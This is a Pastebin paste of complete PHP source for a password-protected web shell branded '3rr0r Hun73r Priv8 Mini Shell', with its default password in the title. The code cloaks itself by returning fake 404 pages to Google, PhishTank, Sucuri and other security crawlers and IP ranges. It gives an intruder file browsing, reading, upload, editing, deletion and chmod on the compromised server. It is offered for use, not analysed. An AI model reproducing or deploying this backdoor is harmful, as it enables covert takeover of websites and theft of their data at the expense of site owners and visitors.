API tools faq
paste
Advertisement
alsakib945

Priv8-Shell-3rr0r Hun73r(default Pass:rbbd95)

alsakib945
Jul 7th, 2019
309
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.43 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. session_start();
  3. set_time_limit(0);
  4. error_reporting(0);
  5. date_default_timezone_set("Asia/Jakarta");
  6. $auth_pass = "e4280d0804461c91c95069aba8bf57f3";
  7. if(get_magic_quotes_gpc()) {
  8. function VEstripslashes($array) {
  9. return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array); }
  10. $_POST = VEstripslashes($_POST);
  11. $_COOKIE = VEstripslashes($_COOKIE); }
  12.  
  13.  
  14. function Login() {
  15. die("
  16. <html>
  17. <head>
  18. <title>3rr0r Hun73r Priv8 Shell</title>
  19. <style type='text/css'>
  20. html {
  21. margin: 20px auto;
  22. background:black;
  23. color: green;
  24. text-align: center;
  25. }
  26. pre {
  27. color: white;
  28. }
  29.  
  30. input[type=password] {
  31. background:transparent;
  32. color:white;
  33. margin:0 10px;
  34. font-family:Homenaje;
  35. font-size:13px;
  36. border:2px solid white;
  37. }
  38.  
  39. </style>
  40. </head>
  41. <center>
  42. <br>
  43. <br>
  44. <header>
  45. <img src='https://i.ibb.co/kKsMWbn/Pics-Art-03-27-11-20-51.png' width='400' align='center'>
  46. <br>
  47. <br>
  48. <pre align=center><form method='post'><input type='password' name='pass' style='background-color:none;border:1px solid #FFF;outline:none;' required><input type=submit value='submit' style='border:none;background-color:#56AD15;color:#fff;cursor:pointer;'></form></pre>
  49. ");
  50. }
  51.  
  52. function VEsetcookie($k, $v) {
  53. $_COOKIE[$k] = $v;
  54. setcookie($k, $v);
  55. }
  56.  
  57. if(!empty($auth_pass)) {
  58. if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  59. VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  60.  
  61. if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  62. Login();
  63. }
  64. ?>
  65. <?php
  66. //Script Recoded By 3rr0r Hun73r
  67. $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
  68. $blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit", "msnbot","p3pwgdsn","netcraft","trendmicro", "ebay", "paypal", "torservers", "messagelabs", "sucuri.net", "crawler");
  69. foreach($blocked_words as $word) {
  70. if (substr_count($hostname, $word) > 0) {
  71. header("HTTP/1.0 404 Not Found");
  72. die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
  73.  
  74. }
  75. }
  76. $bannedIP = array("^81.161.59.*", "^66.135.200.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*", "^91.103.66.*", "^208.91.115.*", "^199.30.228.*");
  77. if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
  78. header('HTTP/1.0 404 Not Found');
  79. exit();
  80. } else {
  81. foreach($bannedIP as $ip) {
  82. if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
  83. header('HTTP/1.0 404 Not Found');
  84. die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
  85. }
  86. }
  87. }
  88.  
  89.  
  90.  
  91. //----------------------------------------------------------------------------------------------------------------//
  92. if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
  93. if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
  94. //----------------------------------------------------------------------------------------------------------------//
  95. ?>
  96. <?php
  97. error_reporting(0);
  98. set_time_limit(0);
  99.  
  100. if(get_magic_quotes_gpc()){
  101. foreach($_POST as $key=>$value){
  102. $_POST[$key] = stripslashes($value);
  103. }
  104. }
  105. echo '<!DOCTYPE HTML>
  106. <html>
  107. <head>
  108. <title>3rr0r Hun73r Mini Shell</title>
  109. <link href="" rel="stylesheet" type="text/css">
  110. <style>
  111. body{
  112. font-family: "Racing Sans One", cursive;
  113. background-color: black;
  114. color:white;
  115. }
  116. #content tr:hover{
  117. background-color: pink;
  118. text-shadow:0px 0px 10px #fff;
  119. }
  120. #content .first{
  121. background-color: pink;
  122. }
  123. table{
  124. border: 1px #000000 dotted;
  125. }
  126. a{
  127. color:white;
  128. text-decoration: none;
  129. }
  130. a:hover{
  131. color:blue;
  132. text-shadow:0px 0px 10px #ffffff;
  133. }
  134. input,select,textarea{
  135. border: 1px #000000 solid;
  136. -moz-border-radius: 5px;
  137. -webkit-border-radius:5px;
  138. border-radius:5px;
  139. }
  140. </style>
  141. </head>
  142. <body>
  143. <h1>
  144. <font color="red">
  145. <marquee direction="left" scrollamount="110"> ================================================================================= </marquee>
  146. </font>
  147. <center>
  148. <font color="blue"> >>->></font>
  149. <font color="red"> 3rr0r</font>
  150. <font color="green"> Hun73r</font>
  151. <font color="red"> -</font>
  152. <font color="yellow"> The</font>
  153. <font color="white"> Fighter</font>
  154. <font color="blue"> <<-<< </font><br/>
  155.  
  156. <font color="white">We Are </font>
  157. <font color="red">Bangladeshi</font>
  158. <font color="green">Hackers</font>
  159. </center>
  160.  
  161. <font color="green">
  162. <marquee direction="right" scrollamount="110"> ============================================================================================= </marquee>
  163. </font> </h1>
  164.  
  165. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  166. <tr><td><font color="green">Path :</font> ';
  167. if(isset($_GET['path'])){
  168. $path = $_GET['path'];
  169. }else{
  170. $path = getcwd();
  171. }
  172. $path = str_replace('\\','/',$path);
  173. $paths = explode('/',$path);
  174.  
  175. foreach($paths as $id=>$pat){
  176. if($pat == '' && $id == 0){
  177. $a = true;
  178. echo '<a href="?path=/">/</a>';
  179. continue;
  180. }
  181. if($pat == '') continue;
  182. echo '<a href="?path=';
  183. for($i=0;$i<=$id;$i++){
  184. echo "$paths[$i]";
  185. if($i != $id) echo "/";
  186. }
  187. echo '">'.$pat.'</a>/';
  188. }
  189. echo '</td></tr><tr><td>';
  190. if(isset($_FILES['file'])){
  191. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  192. echo '<font color="green">Upload Done!</font><br />';
  193. }else{
  194. echo '<font color="red">Upload Failed!</font><br/>';
  195. }
  196. }
  197. echo '<form enctype="multipart/form-data" method="POST">
  198. <font color="white">File Upload :</font> <input type="file" name="file" />
  199. <input type="submit" value="upload" />
  200. </form>
  201. </td></tr>';
  202. if(isset($_GET['filesrc'])){
  203. echo "<tr><td>Current File : ";
  204. echo $_GET['filesrc'];
  205. echo '</tr></td></table><br />';
  206. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  207. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  208. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  209. if($_POST['opt'] == 'chmod'){
  210. if(isset($_POST['perm'])){
  211. if(chmod($_POST['path'],$_POST['perm'])){
  212. echo '<font color="green">Change Permission Done!</font><br/>';
  213. }else{
  214. echo '<font color="red">Change Permission Failed!</font><br />';
  215. }
  216. }
  217. echo '<form method="POST">
  218. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  219. <input type="hidden" name="path" value="'.$_POST['path'].'">
  220. <input type="hidden" name="opt" value="chmod">
  221. <input type="submit" value="Go" />
  222. </form>';
  223. }elseif($_POST['opt'] == 'rename'){
  224. if(isset($_POST['newname'])){
  225. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  226. echo '<font color="green">Change Name Successfully</font><br/>';
  227. }else{
  228. echo '<font color="pink">Name Change Failed</font><br />';
  229. }
  230. $_POST['name'] = $_POST['newname'];
  231. }
  232. echo '<form method="POST">
  233. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  234. <input type="hidden" name="path" value="'.$_POST['path'].'">
  235. <input type="hidden" name="opt" value="rename">
  236. <input type="submit" value="Go" />
  237. </form>';
  238. }elseif($_POST['opt'] == 'edit'){
  239. if(isset($_POST['src'])){
  240. $fp = fopen($_POST['path'],'w');
  241. if(fwrite($fp,$_POST['src'])){
  242. echo '<font color="green">Successfully Edit File</font><br/>';
  243. }else{
  244. echo '<font color="pink">Failed to Edit File</font><br/>';
  245. }
  246. fclose($fp);
  247. }
  248. echo '<form method="POST">
  249. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  250. <input type="hidden" name="path" value="'.$_POST['path'].'">
  251. <input type="hidden" name="opt" value="edit">
  252. <input type="submit" value="Save" />
  253. </form>';
  254. }
  255. echo '</center>';
  256. }else{
  257. echo '</table><br/><center>';
  258. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  259. if($_POST['type'] == 'dir'){
  260. if(rmdir($_POST['path'])){
  261. echo '<font color="green">Deleted Directory</font><br/>';
  262. }else{
  263. echo '<font color="pink">Directory Failed to Delete </font><br/>';
  264. }
  265. }elseif($_POST['type'] == 'file'){
  266. if(unlink($_POST['path'])){
  267. echo '<font color="green">Deleted file</font><br/>';
  268. }else{
  269. echo '<font color="pink">File Failed to Delete</font><br/>';
  270. }
  271. }
  272. }
  273. echo '</center>';
  274. $scandir = scandir($path);
  275. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  276. <tr class="first">
  277. <td><center>Name</peller></center></td>
  278. <td><center>Size</peller></center></td>
  279. <td><center>Permission</peller></center></td>
  280. <td><center>Modify</peller></center></td>
  281. </tr>';
  282.  
  283. foreach($scandir as $dir){
  284. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  285. echo '<tr>
  286. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  287. <td><center>--</center></td>
  288. <td><center>';
  289. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  290. elseif(!is_readable($path.'/'.$dir)) echo '<font color="pink">';
  291. echo perms($path.'/'.$dir);
  292. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  293.  
  294. echo '</center></td>
  295. <td><center><form method="POST" action="?option&path='.$path.'">
  296. <select name="opt">
  297. <option value="">Select</option>
  298. <option value="delete">Delete</option>
  299. <option value="chmod">Chmod</option>
  300. <option value="rename">Rename</option>
  301. </select>
  302. <input type="hidden" name="type" value="dir">
  303. <input type="hidden" name="name" value="'.$dir.'">
  304. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  305. <input type="submit" value=">">
  306. </form></center></td>
  307. </tr>';
  308. }
  309. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  310. foreach($scandir as $file){
  311. if(!is_file($path.'/'.$file)) continue;
  312. $size = filesize($path.'/'.$file)/1024;
  313. $size = round($size,3);
  314. if($size >= 1024){
  315. $size = round($size/1024,2).' MB';
  316. }else{
  317. $size = $size.' KB';
  318. }
  319.  
  320. echo '<tr>
  321. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  322. <td><center>'.$size.'</center></td>
  323. <td><center>';
  324. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  325. elseif(!is_readable($path.'/'.$file)) echo '<font color="pink">';
  326. echo perms($path.'/'.$file);
  327. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  328. echo '</center></td>
  329. <td><center><form method="POST" action="?option&path='.$path.'">
  330. <select name="opt">
  331. <option value="">Select</option>
  332. <option value="delete">Delete</option>
  333. <option value="chmod">Chmod</option>
  334. <option value="rename">Rename</option>
  335. <option value="edit">Edit</option>
  336. </select>
  337. <input type="hidden" name="type" value="file">
  338. <input type="hidden" name="name" value="'.$file.'">
  339. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  340. <input type="submit" value=">">
  341. </form></center></td>
  342. </tr>';
  343. }
  344. echo '</table>
  345. </div>';
  346. }
  347. echo '<center><br/>© 2019 3rr0r Hun73r Priv8 Mini Shell </center>
  348. </body>
  349. </html>';
  350. function perms($file){
  351. $perms = fileperms($file);
  352.  
  353. if (($perms & 0xC000) == 0xC000) {
  354. // Socket
  355. $info = 's';
  356. } elseif (($perms & 0xA000) == 0xA000) {
  357. // Symbolic Link
  358. $info = 'l';
  359. } elseif (($perms & 0x8000) == 0x8000) {
  360. // Regular
  361. $info = '-';
  362. } elseif (($perms & 0x6000) == 0x6000) {
  363. // Block special
  364. $info = 'b';
  365. } elseif (($perms & 0x4000) == 0x4000) {
  366. // Directory
  367. $info = 'd';
  368. } elseif (($perms & 0x2000) == 0x2000) {
  369. // Character special
  370. $info = 'c';
  371. } elseif (($perms & 0x1000) == 0x1000) {
  372. // FIFO pipe
  373. $info = 'p';
  374. } else {
  375. // Unknown
  376. $info = 'u';
  377. }
  378.  
  379. // Owner
  380. $info .= (($perms & 0x0100) ? 'r' : '-');
  381. $info .= (($perms & 0x0080) ? 'w' : '-');
  382. $info .= (($perms & 0x0040) ?
  383. (($perms & 0x0800) ? 's' : 'x' ) :
  384. (($perms & 0x0800) ? 'S' : '-'));
  385.  
  386. // Group
  387. $info .= (($perms & 0x0020) ? 'r' : '-');
  388. $info .= (($perms & 0x0010) ? 'w' : '-');
  389. $info .= (($perms & 0x0008) ?
  390. (($perms & 0x0400) ? 's' : 'x' ) :
  391. (($perms & 0x0400) ? 'S' : '-'));
  392.  
  393. // World
  394. $info .= (($perms & 0x0004) ? 'r' : '-');
  395. $info .= (($perms & 0x0002) ? 'w' : '-');
  396. $info .= (($perms & 0x0001) ?
  397. (($perms & 0x0200) ? 't' : 'x' ) :
  398. (($perms & 0x0200) ? 'T' : '-'));
  399.  
  400. return $info;
  401. }
  402. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!